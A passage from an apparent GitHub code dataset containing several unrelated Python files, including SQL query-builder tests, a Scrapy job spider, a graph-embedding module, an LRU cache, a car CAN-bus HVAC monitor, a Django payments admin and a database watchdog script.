\"\"\"\n query = Query(\n table=\"users\",\n fields=[\"name\", \"email\"],\n filters=[Filter(field=\"name\", operator=FilterOperator.eq, value=\"John\")],\n sort=[\"name\"],\n limit=10,\n offset=10,\n )\n sql = builder.build_query(query=query)\n assert sql == \"SELECT users.name, users.email \\nFROM users \\nWHERE users.name = :name_1\"\n\n\n# filters with joins\ndef test_filter_with_join():\n \"\"\"\n Filter with join\n \"\"\"\n query = Query(\n table=\"posts\",\n fields=[\"title\", \"body\", \"user_name\"],\n filters=[Filter(field=\"user_name\", operator=FilterOperator.eq, value=\"John\")],\n )\n sql = builder.build_query(query=query)\n assert (\n sql\n == \"SELECT posts.title, posts.body, posts_post_user.name AS user_name \\nFROM posts JOIN users AS posts_post_user ON posts.user_id = posts_post_user.id \\nWHERE posts_post_user.name = :name_1\"\n )\n\n\n# aggregates and functions\ndef test_simple_aggregate():\n \"\"\"\n Simple aggregate\n \"\"\"\n query = Query(\n table=\"posts\",\n fields=[Expression(func=\"SUM\", params=[\"likes\"], label=\"total_likes\")],\n filters=[],\n sort=[\"title\"],\n limit=10,\n offset=10,\n )\n sql = 
builder.build_query(query=query)\n assert sql == \"SELECT sum(posts.likes) AS total_likes \\nFROM posts\"\n\n\ndef test_aggregate_with_columns():\n \"\"\"\n Aggregate with columns\n \"\"\"\n query = Query(\n table=\"posts\",\n fields=[Expression(func=\"SUM\", params=[\"likes\"], label=\"total_likes\"), \"title\"],\n filters=[],\n sort=[\"title\"],\n limit=10,\n offset=10,\n )\n sql = builder.build_query(query=query)\n assert sql == \"SELECT sum(posts.likes) AS total_likes, posts.title \\nFROM posts GROUP BY posts.title\"\n\n\n# filters with aggregates and functions\n# Having clause\ndef test_filters_with_aggregates():\n \"\"\"\n Filters with aggregates\n \"\"\"\n query = Query(\n table=\"posts\",\n fields=[\"title\"],\n filters=[Filter(Expression(func=\"SUM\", params=[\"likes\"]), operator=FilterOperator.eq, value=10)],\n sort=[\"title\"],\n limit=10,\n offset=10,\n )\n sql = builder.build_query(query=query)\n assert sql == \"SELECT posts.title \\nFROM posts GROUP BY posts.title \\nHAVING sum(posts.likes) = :sum_1\"\n\n\n# filters with constants and functions\n\n\n# group by\ndef test_group_by():\n \"\"\"\n Group by\n \"\"\"\n query = Query(\n table=\"posts\",\n fields=[\"title\", \"body\", \"user_name\"],\n group_by=[\"title\", \"body\", \"user_name\"],\n )\n sql = builder.build_query(query=query)\n assert (\n sql\n == \"SELECT posts.title, posts.body, posts_post_user.name AS user_name \\nFROM posts JOIN users AS posts_post_user ON posts.user_id = posts_post_user.id GROUP BY posts.title, posts.body, posts_post_user.name\"\n )\n\n\n# or and not and and conditions in joins\n","repo_name":"dhanilan/dbchat","sub_path":"tests/test_sqlalchemy.py","file_name":"test_sqlalchemy.py","file_ext":"py","file_size_in_byte":7124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31034939860","text":"from turtle import *\nfrom time import *\nimport turtle\n\nt = Turtle()\nt.pensize(2)\nt.speed(10000)\nturtle.bgcolor(\"black\")\ncolors = [\"red\", \"yellow\", 'purple', 'blue']\nt._tracer(False)\nfor x in range(400):\n t.forward(2*x)\n t.color(colors[x % 4])\n t.left(91)\nt._tracer(True)\ndone()\n","repo_name":"tear-0/pypyyy","sub_path":"爬虫案例/图.py","file_name":"图.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36572245676","text":"from scrapy.contrib.spiders.crawl import CrawlSpider\nfrom scraper_app.items import JobData\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy import Request\n\n\nclass JobDataSpider(CrawlSpider):\n name = \"manpower_fi\"\n allowed_domains = [\"www.manpower.fi\"]\n start_urls = []\n len = [0, 10, 20, 30, 40, 50, 60, 70, 80, 90]\n for i in len:\n url = \"https://www.manpower.fi/fin/tyon-haku/?search=&offset=%d\" % i\n start_urls.append(url)\n\n def parse(self, response):\n hxs = HtmlXPathSelector(response)\n items = []\n jobs = hxs.select(\"//div[@class='span9 tablet-span9']/article\")\n\n for row in jobs:\n item = JobData()\n item['title'] = row.select(\"./div[@class='media-body']/a/h3/text()\").extract()[0].lower()\n item['link'] = \"https://www.manpower.fi\" + row.select(\"./div[@class='media-body']/a/@href\").extract()[0]\n item['source'] = \"www.manpower.fi\"\n items.append(item)\n\n for item in items:\n request = Request(\"%s\" % item['link'], callback=self.description_parse)\n request.meta['item'] = item\n yield request\n\n def description_parse(self, response):\n item = response.meta['item']\n 
item['location'] = response.xpath(\"//div[@class='mp-jobdetails-bold pull-left'][1]/text()\").extract()[0].lower()\n        description_list = response.xpath(\"//div[@class='mp-article-body']/section/text()\").extract()\n\n        item['description'] = \"\"\n        for i in description_list:\n            item['description'] += i\n\n        return item\n","repo_name":"nnduc1994/ziliot_spider","sub_path":"spiders/Finland_spider/manpower_fi.py","file_name":"manpower_fi.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33707745377","text":"import datetime\n\nfrom sqlalchemy import Column, Enum, Integer, String, ForeignKey, DateTime, CheckConstraint\nfrom ClientServer.models.db_config import Base\n\nclass File(Base):\n    __tablename__ = 'files'\n\n    id = Column(Integer, primary_key=True)\n    file_name = Column(String(50), CheckConstraint('length(file_name) > 3'), nullable=False)\n    path = Column(String(600), nullable=False, default='./')\n    user_id = Column(Integer, ForeignKey('users.id'))\n    date = Column(DateTime, default=datetime.datetime.now)  # pass the callable, not now(), so each insert gets a fresh timestamp\n    size = Column(Integer, CheckConstraint('size > 0'), default=0)\n","repo_name":"VanekCheck/map-reduce","sub_path":"ClientServer/models/File.py","file_name":"File.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39485956836","text":"import csv\nimport itertools\nimport math\nimport time\nimport logging\nimport sys\nimport os\nimport random\nimport warnings\nimport pandas as pd\nimport numpy as np\nimport scipy\nimport optuna\nimport sklearn.preprocessing as pp\n\nfrom tqdm import tqdm_notebook as tqdm\nfrom collections import Counter, defaultdict\n\nfrom pathlib import Path\nfrom sklearn import random_projection\nfrom sklearn.preprocessing import normalize, scale, MultiLabelBinarizer\nfrom scipy.sparse import coo_matrix, csr_matrix, csc_matrix, diags, spdiags, vstack, hstack\n\n# projection method: choose from Gaussian and Sparse\n# input matrix: choose from adjacency and transition matrix\n# alpha adjusts the weighting of nodes according to their degree\n\ndef adj_matrix_weight_merge(A, adj_weight):\n\n    N = A[0][0].shape[0]\n    temp = csr_matrix((N,N))\n    for i in range(len(adj_weight)):\n        \n        try:\n            temp = temp + adj_weight[i]*A[i][0].tocsr()\n            # temp = temp + adj_weight[i]*(A[i][0]+csc_matrix(np.eye(N)))\n        except:\n            temp = temp + adj_weight[i]*A[0][i].tocsr()\n            # temp = temp + adj_weight[i]*(A[0][i]+csc_matrix(np.eye(N)))\n    return temp+temp.transpose()\n\ndef fastrp_projection(train, feature, final_adj_matrix, edge_type, q=3, dim=128, projection_method='gaussian', input_matrix='adj', alpha=None, s=1, threshold=0.95, gama=1, feature_similarity=False):\n    assert input_matrix == 'adj' or input_matrix == 'trans'\n    assert projection_method == 'gaussian' or projection_method == 'sparse'\n    \n    num_edge = len(edge_type)\n    M = final_adj_matrix\n\n    if feature_similarity == True:\n        feature = pp.normalize(feature, axis=1).T\n    \n\n    # Gaussian projection matrix\n    if projection_method == 'gaussian':\n        transformer = random_projection.GaussianRandomProjection(n_components=dim, random_state=7)\n    # Sparse projection matrix\n    else:\n        transformer = random_projection.SparseRandomProjection(n_components=dim, random_state=7)\n    Y = transformer.fit(feature)\n    \n\n    # Construct the inverse of the degree matrix\n    if input_matrix != 'adj':\n        rowsum = M.sum(axis=1)\n        colsum = M.sum(axis=0).T\n        rowsum = 
np.squeeze(np.asarray(rowsum+colsum))**-1\n rowsum[np.isinf(rowsum)]=1\n D_inv = diags(rowsum)\n\n cur_U = transformer.transform(feature)\n if feature_similarity == True:\n cur_U = feature.T @ cur_U\n cur_U = M @ cur_U\n\n if input_matrix != 'adj':\n # normalization\n cur_U = D_inv @ cur_U\n U_list = [cur_U]\n\n for j in range(1, q):\n # cur_U = M @ cur_U\n cur_U = M.dot(cur_U)\n if input_matrix != 'adj':\n # normalization\n cur_U = D_inv @ cur_U\n\n U_list.append(cur_U)\n\n return U_list\n\n# When weights is None, concatenate instead of linearly combines the embeddings from different powers of A\ndef fastrp_merge(U_list, weights, edge_types, normalization=False, q=3):\n\n print('merge')\n num_edge = len(edge_types)\n\n if weights is None:\n # return np.concatenate(_U_list, axis=1)\n return hstack(U_list)\n \n U = np.zeros_like(U_list[0])\n for cur_U, weight in zip(U_list, weights):\n U += cur_U * weight\n try:\n U = U.todense()\n except:\n pass\n U = np.squeeze(np.asarray(U)) # convert numpy matrix to array\n return U.todense() if type(U) == csr_matrix else U\n\n# A is always the adjacency matrix\n# the choice between adj matrix and trans matrix is decided in the conf\ndef fastrp_wrapper(A, feature, motifs, conf):\n final_adj_matrix = adj_matrix_weight_merge(A, adj_weight = conf['adj_weight'])\n U_list = fastrp_projection(A,\n feature,\n final_adj_matrix,\n q=conf['q'],\n dim=conf['dim'],\n projection_method=conf['projection_method'],\n input_matrix=conf['input_matrix'],\n edge_type = conf['edge_type'],\n s=conf['s'],\n feature_similarity=conf['feature_similarity']\n )\n U = fastrp_merge(U_list, conf['weights'], conf['edge_type'], conf['normalization'], conf['q'])\n return U\n\ndef get_emb_filename(prefix, conf):\n return prefix + '-dim=' + str(conf['dim']) + ',projection_method=' + conf['projection_method'] \\\n + ',input_matrix=' + conf['input_matrix'] + ',normalization=' + str(conf['normalization']) \\\n + ',weights=' + (','.join(map(str, conf['weights'])) if conf['weights'] is not None else 'None') \\\n + ',alpha=' + (str(conf['alpha']) if 'alpha' in conf else '') \\\n + ',C=' + (str(conf['C']) if 'alpha' in conf else '1.0') \\\n + '.mat'\n\n","repo_name":"FAME-code/FAME","sub_path":"fastrp.py","file_name":"fastrp.py","file_ext":"py","file_size_in_byte":4779,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"42877089037","text":"#!/usr/bin/python3\n\"\"\" 3-lru_cache.py \"\"\"\nfrom base_caching import BaseCaching\n\n\nclass LRUCache(BaseCaching):\n \"\"\" LRUCache class that inherits from BaseCaching \"\"\"\n\n def __init__(self):\n \"\"\" Initialize \"\"\"\n super().__init__()\n self.order = []\n\n def put(self, key, item):\n \"\"\" Add an item in the cache \"\"\"\n if key is None or item is None:\n return\n\n # if the key already exists, move it to the end of the list\n if key in self.cache_data:\n self.order.remove(key)\n # otherwise, if the cache is full, evict the least recently used item\n elif len(self.cache_data) >= BaseCaching.MAX_ITEMS:\n lru = self.order.pop(0)\n del self.cache_data[lru]\n print(\"DISCARD: {}\".format(lru))\n\n # add the new key to the end of the list and update the cache\n self.order.append(key)\n self.cache_data[key] = item\n\n def get(self, key):\n \"\"\" Get an item by key \"\"\"\n if key is None or key not in self.cache_data:\n return None\n\n ''' move the key to the end of the list'''\n self.order.remove(key)\n self.order.append(key)\n\n return 
self.cache_data[key]\n","repo_name":"ofemjohn/alx-backend","sub_path":"0x01-caching/3-lru_cache.py","file_name":"3-lru_cache.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23868249768","text":"import pandas\nimport subprocess\nfrom datetime import datetime\nfrom time import sleep\nimport dbo\n\nconfig_file = 'config.cfg'\nverbose = True\n\n### Create status functions - FUTURE move functions to seperate file ###\n\ndef watchdog_output_to_db(data_source_updates):\n #Post message to database\n session = dbo.output_db.engine()\n data = pandas.DataFrame()\n data = data.append(data_source_updates, ignore_index=True)\n data.to_sql(dbo.output_db.table, session, if_exists='append', index=False)\n #session.close()\n \ndef watchdog_status_message(status): \n status_ts = pandas.datetime.now()\n \n data_source_updates = pandas.Series(\n {'_server' : 'WatchdogStatusMessage',\n '_db_type' : None,\n '_table' : 'WatchdogStatusMessage',\n '_column' : None,\n '_last_update' : None,\n '_status' : status,\n '_query_timestamp' : status_ts })\n \n if verbose: print('WatchdogStatusMessage: ' + str(status))\n \n watchdog_output_to_db(data_source_updates)\n return None\n\ndef watchdog_parse_error(source, error):\n \n status_ts = pandas.datetime.now()\n \n _dbobject = eval('dbo.' + source.dbobject)\n _database = source.database\n _table = source.table\n _column = source.column\n \n data_source_updates = pandas.Series(\n {'_server' : _dbobject.server,\n '_db_type' : _dbobject.dbtype,\n '_table' : '%s.%s' %(_database,_table),\n '_column' : _column,\n '_last_update' : None,\n '_status' : 'WatchdogParseError: ' + str(error),\n '_query_timestamp' : pandas.datetime.now() })\n \n if verbose: print('WatchdogParseError: ' + str(error))\n \n watchdog_output_to_db(data_source_updates)\n return None\n\n### Begin primary functionality ###\n\n# Log watchdog start in output db\nwatchdog_status_message('start')\n\n# Get config file\ntry:\n source = pandas.read_csv(config_file,sep=',', header=None, quotechar=\"'\")\n source.columns = ['dbobject','database','table','column','timezone','parseint','active']\n\nexcept Exception as error:\n watchdog_status_message('Error loading initial config file - Terminating watchdog - ' + str(error))\n exit()\n\n# Initiate minute holder\n\nminute_previous = datetime.now().minute\n\nwhile True:\n\n # Get current minute\n minute_current = datetime.now().minute\n \n # If current minute != previous minute\n if minute_current != minute_previous:\n \n #Store current minute\n minute_previous = minute_current\n \n if verbose: print(datetime.now())\n \n #Send heartbeat to output table\n watchdog_status_message('heartbeat')\n \n #Check for updated config file\n source_ = source.copy(deep=True)\n \n try:\n source = pandas.read_csv(config_file,sep=',', header=None, quotechar=\"'\")\n source.columns = ['dbobject','database','table','column','timezone','parseint','active']\n \n except Exception as error:\n watchdog_status_message('Error loading config file')\n \n if source.equals(source_) == False:\n watchdog_status_message('Change detected in config file')\n \n # Check the schedule for each table\n for idx in source.index.values:\n \n # Check the minute against the interval setting\n # If minute mod interval = 0, call the parsing function\n if (source.active[idx]) * (minute_current % source.parseint[idx] == 0):\n \n # Call parsing function\n try:\n\n _dbobject = source.dbobject[idx]\n _database = 
source.database[idx]\n _table = source.table[idx]\n _column = source.column[idx]\n _timezone = source.timezone[idx]\n _parseint = source.parseint[idx]\n\n parse_cmd = \"python parse.py -o '\" + _dbobject + \"' -d '\" + _database + \"' -t '\" + _table + \"' -c '\" + _column + \"' -z '\" + _timezone + \"'\"\n\n if verbose: print(parse_cmd)\n \n subprocess.Popen(parse_cmd, shell=True)\n \n except Exception as error:\n if verbose: print(error)\n watchdog_parse_error(source.loc[idx], error)\n \n\n ### Hold for one second\n sleep(1)","repo_name":"data-ninja-1812/sample-portfolio","sub_path":"data-engineering/watchdog-v5/watchdog.py","file_name":"watchdog.py","file_ext":"py","file_size_in_byte":4524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4689572031","text":"from django.contrib import admin, messages\nfrom apps.payments.models import Wallet, Transaction, TransactionStatus\nfrom .forms import TransactionForm\n\n\nclass WalletAdmin(admin.ModelAdmin):\n list_display = ('user', 'balance',)\n readonly_fields = ('user', 'balance', 'deleted_at',)\n search_fields = ('user__email',)\n\n\nclass TransactionAdmin(admin.ModelAdmin):\n form = TransactionForm\n list_display = ('reference', 'value', 'status',\n 'credit_to', 'debit_to', \"created_at\")\n list_filter = ('status', 'credit_to', 'debit_to')\n search_fields = ('reference', 'payment_provider_txn_id',)\n readonly_fields = ('deleted_at', 'updated_by',)\n\n def save_model(self, request, obj, form, change):\n # Call the clean method to trigger validation and apply logic\n if form.is_valid():\n form.instance.updated_by = request.user\n try:\n reference, value, message = form.process_transaction()\n except Exception as e:\n self.message_user(request, str(e), level=messages.ERROR)\n return\n\n form.instance.reference = reference\n form.instance.value = value\n\n if message:\n messages.success(request, message)\n return super().save_model(request, obj, form, change)\n\n def message_user(self, request, message, level=messages.SUCCESS, extra_tags='', fail_silently=False):\n if level == messages.ERROR:\n super().message_user(request, message, level, extra_tags, fail_silently)\n\n def get_readonly_fields(self, request, obj=None):\n if obj and obj.status == TransactionStatus.SUCCESSFUL:\n return self.readonly_fields + tuple(\n [\n item.name\n for item in obj._meta.fields\n if item.name not in [\"deleted_at\", \"updated_by\", ]\n ]\n )\n else:\n return self.readonly_fields\n\n\nadmin.site.register(Wallet, WalletAdmin)\nadmin.site.register(Transaction, TransactionAdmin)\n","repo_name":"gbolly/code_snippets","sub_path":"beta_eshopping/payments/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70882221869","text":"#!/usr/bin/python3\n#// Ford FG can0hvac\n#https://github.com/jakka351/FG-Falcon/\n#pip3 install regex uinput evdev python-can\nimport can \nimport time\nimport os\nimport queue\nimport sys, traceback\nfrom threading import Thread\n#############################\n#animation = \"|/-\\\\\"\n#############################\nHVAC = 0x353 #can id 851 \nHVAC_off = 0xAB # [5] A 129 0 0 34 [171] 0 0 All Off\nHVAC_TEMP = 0 #851 x4\nHVAC_OUT = 0 #Outside Temp 851 x5\nHVAC_FANSPEED = 0 #Fan speed 851 x8\nHVAC_VENTSTATUS = 0 #Vent tatus 851 x1\nVA = 0x4B # print('Foot Vents, Close Cabin')\nVB = 0x2B # print('Foot Vents, Open Cabin')\nVC = 0x2F # print('Window and Feet 
Vets, Open Cabin')\nVD = 0x4F # print('Window and Feet Vents, Close Cabin')\nVE = 0x5B # print('Face, Foot, Close Cabin')\nVF = 0x3B # print('Face, Foot, Open Cabin')\nVG = 0x33 # print('Face, Open Cabin')\nVH = 0x53 # print('Face, Close Cabin')\nVI = 0x27 # print('Window, Manual Fan')\nVJ = 0x26 # print('Window, Auto Fan')\nVK = 0x83 # print('A/C Off, Open Cabin')\nVL = 0x8B # print('A/C Off, Foot Vents, Open Cabin')\nVM = 0x8F # print('A/C Off, Foot and Window Vents, Open Cabin')\nVN = 0x9B # print('A/C Off, Foot and Face Vents, Open Cabin')\nVO = 0xA6 # print('A/C Off, Window Vents, Open Cabin')\nVP = 0xA7 # print('A/C Off, Manual Fan, Open Cabin')\nVQ = 0xC3 # print('A/C Off, Close Cabin')\nVR = 0xCB # print('A/C Off, Foot Vents, Close Cabin')\nVS = 0xCF # print('A/C Off, Foot and Window Vents, Close Cabin')\nVT = 0xDB # print('A/C Off, Foot and Face Vents, Close Cabin')\nVU = 0x43 # print('Auto, Close Cabin')\nVW = 0x23 # print('Auto, Open Cabin')\n#############################\ntry:\n bus = can.interface.Bus(channel='can0', bustype='socketcan') #bus channel & type refer to python-can docs\n \n time.sleep(0.05)\n print('─────────────────────────────────────────────────── ─── ─── ─── ─── ─── ─── ')\n time.sleep(0.05)\n \n print(' ███████  ██████  ███████  █████  ██  ██████  ██████  ███  ██ ')\n time.sleep(0.05)\n print(' ██      ██       ██      ██   ██ ██  ██      ██    ██ ████  ██ ')\n time.sleep(0.05)\n print(' █████  ██  ███  █████  ███████ ██  ██  ██  ██ ██ ██  ██ ')\n time.sleep(0.05)\n print(' ██     ██  ██  ██     ██   ██ ██  ██  ██  ██ ██  ██ ██ ')\n time.sleep(0.05)\n print(' ██   ██████   ██  ██  ██ ███████  ██████  ██████  ██   ████ ')\n time.sleep(1.0)\n\n print(' ╔═╗╦ ╦╔╦╗╦ ╦╔═╗╔╗╔ ╔═╗╔═╗╔╗╔ ╦ ╦╦ ╦╔═╗╔═╗ ╔═╗╔═╗╦═╗╦╔═╗╔╦╗')\n time.sleep(0.08)\n print(' ╠═╝╚╦╝ ║ ╠═╣║ ║║║║───║ ╠═╣║║║ ╠═╣╚╗╔╝╠═╣║ ╚═╗║ ╠╦╝║╠═╝ ║ ')\n time.sleep(0.08)\n print(' ╩ ╩ ╩ ╩ ╩╚═╝╝╚╝ ╚═╝╩ ╩╝╚╝ ╩ ╩ ╚╝ ╩ ╩╚═╝ ╚═╝╚═╝╩╚═╩╩ ╩ ')\n\n print(' ')\n\n print(' https://github.com/jakka351/fg-falcon')\n \n print(' ')\n time.sleep(0.08)\n\n\n print(' ┌─┐┌─┐┌┐┌┌┬┐┬─┐┌─┐┬ ┬ ┌─┐┬─┐ ┌─┐┬─┐┌─┐┌─┐ ┌┐┌┌─┐┌┬┐┬ ┬┌─┐┬─┐┬┌─ ')\n time.sleep(0.15)\n print(' │ │ ││││ │ ├┬┘│ ││ │ ├┤ ├┬┘ ├─┤├┬┘├┤ ├─┤ │││├┤ │ ││││ │├┬┘├┴┐ ')\n time.sleep(0.15)\n print(' └─┘└─┘┘└┘ ┴ ┴└─└─┘┴─┘┴─┘└─┘┴└─ ┴ ┴┴└─└─┘┴ ┴ ┘└┘└─┘ ┴ └┴┘└─┘┴└─┴ ┴ ')\n time.sleep(0.15)\n print(' ')\n time.sleep(0.5)\n print('─────────────────────────────────────────────────── ─── ─── ─── ─── ─── ─── ')\n \n time.sleep(4.0) \n os.system('cansend can0 353#4B.00.00.0F.16.00.00.04') \nexcept OSError:\n print('can0swc cannot start can0 or can1 interface: can0swc cant get it up: check wiring and config')\n #GPIO.output(led,False)\n exit()\n\n#############################\ndef can_rx_task(): # Recv can frames only with CAN_ID specified in SWC variable\n while True:\n message = bus.recv()\n if message.arbitration_id == HVAC: #CAN_ID variable\n q.put(message) # Put message into queue\n # print(message)\n\n\nq = queue.Queue()\nrx = Thread(target = can_rx_task)\nrx.start()\n#c = ''\ncount = 0\ntime.sleep(1.0)\n\n#############################\n# Main loop\ntry:\n while True:\n for i in range(1):\n while(q.empty() == True): # Wait until there is a message\n pass\n message = q.get()\n \n if message.arbitration_id == HVAC and message.data[3] != HVAC_TEMP:\n print('─────────────────────────────────────────────────── ─── ─── ─── ─── ─── ─── ')\n print('╔═╗╦╦═╗╔═╗╔═╗╔╗╔ ╔╦╗╔═╗╔╦╗╔═╗ ┌─┐')\n print('╠═╣║╠╦╝║ ║ ║║║║ ║ ║╣ ║║║╠═╝ │ ')\n print('╩ ╩╩╩╚═╚═╝╚═╝╝╚╝ ╩ ╚═╝╩ ╩╩ └─┘')\n print(message.data[3] 
/ 2)\n                time.sleep(1.0)\n\n            if message.arbitration_id == HVAC and message.data[4] != HVAC_OUT:\n\n                print('─────────────────────────────────────────────────── ─── ─── ─── ─── ─── ─── ')\n                print('╔╦╗╔═╗╔╦╗╔═╗ ╔═╗╦ ╦╔╦╗╔═╗╦╔╦╗╔═╗ ┌─┐')\n                print(' ║ ║╣ ║║║╠═╝ ║ ║║ ║ ║ ╚═╗║ ║║║╣ │ ')\n                print(' ╩ ╚═╝╩ ╩╩ ╚═╝╚═╝ ╩ ╚═╝╩═╩╝╚═╝ └─┘')\n                print(message.data[4])\n                time.sleep(1.0)\n\n            if message.arbitration_id == HVAC and message.data[7] != HVAC_FANSPEED:\n                print('─────────────────────────────────────────────────── ─── ─── ─── ─── ─── ─── ')\n                print('╔╔═╗╔═╗╔╗╔ ╔═╗╔═╗╔═╗╔═╗╔╦╗ ')\n                print(' ╠╣ ╠═╣║║║ ╚═╗╠═╝║╣ ║╣ ║║ ')\n                print(' ╚ ╩ ╩╝╚╝ ╚═╝╩ ╚═╝╚═╝═╩╝ ')\n                print(message.data[7])\n                time.sleep(1.0)\n\n            if message.arbitration_id == HVAC and message.data[0] != HVAC_VENTSTATUS:\n                print('─────────────────────────────────────────────────── ─── ─── ─── ─── ─── ─── ')\n                print('╦ ╦╔═╗╔╗╔╔╦╗ ╔═╗╔╦╗╔═╗╔╦╗╦ ╦╔═╗')\n                print('╚╗╔╝║╣ ║║║ ║ ╚═╗ ║ ╠═╣ ║ ║ ║╚═╗')\n                print(' ╚╝ ╚═╝╝╚╝ ╩ ╚═╝ ╩ ╩ ╩ ╩ ╚═╝╚═╝')\n                if message.data[0] == VA:\n                    print('Foot Vents, Close Cabin')\n                if message.data[0] == VB:\n                    print('Foot Vents, Open Cabin')\n                if message.data[0] == VC: \n                    print('Window and Foot Vents, Open Cabin')\n                if message.data[0] == VD:\n                    print('Window and Foot Vents, Close Cabin')\n                if message.data[0] == VE:\n                    print('Face, Foot, Close Cabin')\n                if message.data[0] == VF:\n                    print('Face, Foot, Open Cabin')\n                if message.data[0] == VG:\n                    print('Face, Open Cabin')\n                if message.data[0] == VH: \n                    print('Face, Close Cabin')\n                if message.data[0] == VI: \n                    print('Window, Manual Fan')\n                if message.data[0] == VJ: \n                    print('Window, Auto Fan')\n                if message.data[0] == VK:\n                    print('A/C Off, Open Cabin')\n                if message.data[0] == VL:\n                    print('A/C Off, Foot Vents, Open Cabin')\n                if message.data[0] == VM:\n                    print('A/C Off, Foot and Window Vents, Open Cabin')\n                if message.data[0] == VN:\n                    print('A/C Off, Foot and Face Vents, Open Cabin')\n                if message.data[0] == VO:\n                    print('A/C Off, Window Vents, Open Cabin')\n                if message.data[0] == VP:\n                    print('A/C Off, Manual Fan, Open Cabin')\n                if message.data[0] == VQ:\n                    print('A/C Off, Close Cabin')\n                if message.data[0] == VR:\n                    print('A/C Off, Foot Vents, Close Cabin')\n                if message.data[0] == VS:\n                    print('A/C Off, Foot and Window Vents, Close Cabin')\n                if message.data[0] == VT:\n                    print('A/C Off, Foot and Face Vents, Close Cabin')\n                if message.data[0] == VU:\n                    print('Auto, Close Cabin')\n                if message.data[0] == VW: \n                    print('Auto, Open Cabin')\n                time.sleep(1.2) \n                print(' ')\n                print('─────────────────────────────────────────────────── ─── ─── ─── ─── ─── ─── ')\n                \n\n            if message.arbitration_id == HVAC and message.data[5] == HVAC_off:\n                print('AC Off')\n                time.sleep(1.0)\n\n            if message.arbitration_id == HVAC and message.data[1] != 0:\n                pass\n\n            if message.arbitration_id == HVAC and message.data[2] != 0:\n                pass\n\n            if message.arbitration_id == HVAC and message.data[6] != 0:\n                pass\n            \n############################\n\n############################\n# end\nexcept KeyboardInterrupt:\n    exit()\nexcept OSError:\n    # OSError must come before the generic Exception handler to be reachable\n    exit()\nexcept Exception:\n    traceback.print_exc(file=sys.stdout)\n    exit()\n############################\n# can0hvac\n############################\n\n","repo_name":"jakka351/FG-Falcon","sub_path":"resources/software/jakka351/can0hvac.py","file_name":"can0hvac.py","file_ext":"py","file_size_in_byte":12496,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"37"} +{"seq_id":"72550658346","text":"# create train\r\nclass Train():\r\n    directions = ( #(x,y)\r\n        (0,-2), #0, up\r\n
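        # added note: each pair below is a (dx, dy) step that move_train scales by self.speed;\r\n        # the 16 headings sweep clockwise in 22.5-degree increments starting from 'up'.\r\n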
(1,-2), #1, up-up-right\r\n        (2,-2), #2, up-right\r\n        (2,-1), #3, up-right-right\r\n        (2,0), #4, right\r\n        (2,1), #5, down-right-right\r\n        (2,2), #6, down-right\r\n        (1,2), #7, down-down-right\r\n        (0,2), #8, down\r\n        (-1,2), #9, down-down-left\r\n        (-2,2), #10 down-left\r\n        (-2,1), #11 down-left-left\r\n        (-2,0), #12 left\r\n        (-2,-1),#13 up-left-left\r\n        (-2,-2),#14 up-left\r\n        (-1,-2) #15 up-up-left\r\n        )\r\n\r\n    def __init__(self, startx, starty, startdir, c):\r\n        self.x = startx\r\n        self.y = starty\r\n        self.direction = startdir\r\n        self.speed = 0\r\n        self.object = c.create_rectangle(startx-10, starty-10, startx+10, starty+10, outline='black')\r\n        c.bind_all('<Left>', self.turn_left)\r\n        c.bind_all('<Right>', self.turn_right)\r\n        c.bind_all('<Up>', self.speed_up)\r\n        c.bind_all('<Down>', self.slow_down)\r\n\r\n    def turn_left(self, event):\r\n        self.direction -= 1\r\n        self.direction %= 16\r\n    \r\n    def turn_right(self, event):\r\n        self.direction += 1\r\n        self.direction %= 16\r\n    \r\n    def speed_up(self, event):\r\n        if self.speed == 0:\r\n            self.speed = 2\r\n        elif self.speed == 2:\r\n            self.speed = 4\r\n    \r\n    def slow_down(self, event):\r\n        if self.speed == 4:\r\n            self.speed = 2\r\n        elif self.speed == 2:\r\n            self.speed = 0\r\n\r\n    def move_train(self, c):\r\n        dir_vect = self.directions[self.direction]\r\n        c.move(self.object, dir_vect[0] * self.speed, dir_vect[1] * self.speed)\r\n        c.xview_scroll(dir_vect[0] * self.speed, 'units')\r\n        c.yview_scroll(dir_vect[1] * self.speed, 'units')\r\n    \r\n","repo_name":"jacobv1234/train-exploration-game","sub_path":"testing/4.independent-background/objects/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"31254269007","text":"import sys\nfrom itertools import permutations\ninput = sys.stdin.readline\n\nk = int(input())\nop = input().split()\n\ndef chk(li):\n    for i, e in enumerate(op):\n        if not ((li[i]<li[i+1]) if e=='<' else (li[i]>li[i+1])):\n            return False\n    return True\nmx = (0,)*(k+1)\nmn = (9,)*(k+1)\nfor li in permutations(range(10),(k+1)):\n    if chk(li):\n        now = tuple(li)\n        if now>mx:mx = now\n        if now < mn:mn = now\n\nprint(''.join(map(str,mx)))\nprint(''.join(map(str,mn)))\n\n","repo_name":"yunyshs01/algo","sub_path":"src/2529.py","file_name":"2529.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71234963627","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# =============================================================================\n# Created By : Ben Feigenbaum\n# =============================================================================\n\"\"\"Creating training and testing dataset for training and evaluation\"\"\"\n# =============================================================================\n# Imports\nimport pandas as pd\n# =============================================================================\n\n\ndef 